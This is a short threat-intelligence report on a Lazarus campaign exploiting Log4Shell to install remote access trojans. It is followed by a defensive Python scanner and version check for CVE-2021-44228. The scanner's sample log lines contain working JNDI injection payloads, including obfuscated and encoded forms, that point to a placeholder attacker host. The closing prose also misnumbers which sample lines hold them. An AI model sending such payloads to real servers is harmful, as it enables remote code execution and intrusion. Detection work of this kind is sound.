Cisco Talos reports an active campaign, dubbed "Blacksmith," attributed to the DPRK-nexus Lazarus. The actor has been exploiting the infamous CVE-2021-44228, more commonly known as "Log4j" or "Log4Shell," to deploy several strains of remote access trojans (RATs).
Available intelligence indicates that reconnaissance has been carried out by a Lazarus sub-unit known as "Andariel" or "Silent Chollima," which has historically been tasked with identifying targets that can be exploited in long-term espionage campaigns.
Successful exploitation leads to the installation of the following RATs:
NineRAT, which uses Telegram for command-and-control (C2).
DLRAT, a sophisticated backdoor that can operate as a downloader, communicate with the C2 server, and perform extended post-exploitation reconnaissance.
BottomLoader, a downloader that retrieves a post-exploitation tool, HazyLoad. HazyLoad was previously observed in the DPRK-attributed exploitation of CVE-2023-42793, a remote-code execution vulnerability affecting multiple versions of the JetBrains TeamCity server.
Mitigation strategies include patching CVE-2021-44228, which affects Apache Log4j2 versions 2.0-beta9 through 2.15.0 (excluding the security releases 2.12.2, 2.12.3, and 2.3.1).
A cursory search for "log4j2" in open-source internet scanners returns numerous matching instances, but those results say nothing conclusive about whether the instances are actually exploitable, nor about the accuracy of the scanner data itself.
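The two defensive checks the last two paragraphs imply, written out as an added example that is not code from Cisco Talos, the Apache Log4j project, or the original article: a scanner that reads web-server access-log lines for `${jndi:` lookup strings (decoding percent-encoding and collapsing the nested lookups such as `${lower:j}` that defeat a literal string match), and a version test against the affected range stated above. The log lines, the `attacker.example` hostname and all function names are constructed for this illustration.

```python
"""Defensive checks for CVE-2021-44228 (Log4Shell).

Added example; not code from Cisco Talos, Apache Log4j or the original article.
All log lines, hostnames and function names below are constructed for illustration.
"""
import re
from urllib.parse import unquote

# Affected range as stated in the advisory: 2.0-beta9 through 2.15.0 inclusive,
# except the security releases 2.12.2, 2.12.3 and 2.3.1.
LOWER_BOUND = "2.0-beta9"
UPPER_BOUND = "2.15.0"
FIXED_BACKPORTS = {"2.12.2", "2.12.3", "2.3.1"}

# A nested lookup such as ${lower:j}, ${upper:N}, ${env:NOPE:-j} or ${::-j} resolves
# to its final value; obfuscated payloads spell "jndi" this way so a plain string
# match misses them. The lookahead leaves the ${jndi:...} lookup itself intact.
_NESTED = re.compile(r"\$\{(?!jndi:)[a-zA-Z0-9_]*:(?:[^${}]*?:-)?([^${}]*)\}")
# After normalisation a JNDI lookup reads ${jndi:<protocol>:[//]<host>...
_JNDI = re.compile(r"\$\{jndi:([a-z]+):(?://)?([^/}\s]*)")


def _url_decode(text: str) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded requests are caught."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize(text: str) -> str:
    """Lower-case and collapse nested lookups until the text stops changing."""
    text = text.lower()
    previous = None
    while previous != text:
        previous = text
        text = _NESTED.sub(lambda m: m.group(1), text)
    return text


def scan_log(lines):
    """Return one finding per JNDI lookup found in the given access-log lines."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(_url_decode(line))
        for match in _JNDI.finditer(normalized):
            findings.append({
                "line": number,
                "protocol": match.group(1),
                "host": match.group(2),
                "raw": line,
            })
    return findings


def _version_key(version: str) -> tuple:
    """Sortable key: beta < rc < final, e.g. 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1."""
    base, _, pre = version.lower().partition("-")
    nums = [int(part) for part in base.split(".")]
    nums += [0] * (3 - len(nums))
    if pre.startswith("beta"):
        pre_key = (0, int(pre[4:] or 0))
    elif pre.startswith("rc"):
        pre_key = (1, int(pre[2:] or 0))
    else:
        pre_key = (2, 0)
    return (*nums[:3], *pre_key)


def is_vulnerable_version(version: str) -> bool:
    """True when the version lies in the affected range stated in the advisory.
    Log4j 1.x is a separate code base and falls outside CVE-2021-44228."""
    if version in FIXED_BACKPORTS:
        return False
    return _version_key(LOWER_BOUND) <= _version_key(version) <= _version_key(UPPER_BOUND)


# Constructed Apache-style access-log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2023:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [12/Dec/2023:10:01:09 +0000] "GET /?x=${${lower:j}${upper:N}di:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [12/Dec/2023:10:01:11 +0000] "GET /login HTTP/1.1" 200 88 "-" "%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fc%7D"',
    '10.0.0.9 - - [12/Dec/2023:10:01:13 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: jndi via {finding['protocol']} to {finding['host']}")
    for ver in ("2.14.1", "2.12.2", "2.16.0"):
        print(ver, "affected" if is_vulnerable_version(ver) else "not affected")
```

The normaliser is what makes the scan useful: the first, third and fourth sample lines carry the same lookup in plain, nested and percent-encoded form, and only the normalised text is matched. The version test complements the open-source scanner results mentioned above, since knowing a host runs "log4j2" says nothing until the exact version is compared with the affected range.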